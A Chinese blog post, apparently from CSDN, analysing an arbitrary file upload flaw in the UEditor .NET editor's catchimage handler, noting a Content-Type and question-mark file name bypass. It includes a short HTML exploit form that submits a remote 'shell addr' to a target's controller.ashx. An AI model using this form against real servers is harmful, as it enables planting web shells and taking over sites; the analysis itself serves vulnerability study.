UEditor编辑器任意文件上传漏洞分析

本文分析了UEditor编辑器中的一个安全漏洞,该漏洞允许任意文件上传。通过对上传过程的深入研究,发现漏洞存在于CrawlerHandler类中,通过设置Content-Type为image/png可以绕过检查。此外,文件名的解析问题也是关键,利用问号可以规避.aspx的限制,导致安全风险。参考链接提供了更多详细信息。
摘要由CSDN通过智能技术生成

ue下载地址
http://http://ueditor.baidu.com/website/download.html
exp

<form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell addr:<input type="text" name="source[]" /></p >

  <inputtype="submit" value="Submit" />

</form>


我们首先来看一下目录结构

ue是一个典型的net web

bin目录和app_code目录其中bin下面引用的是jsondll 因此这里我们不分析dll

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值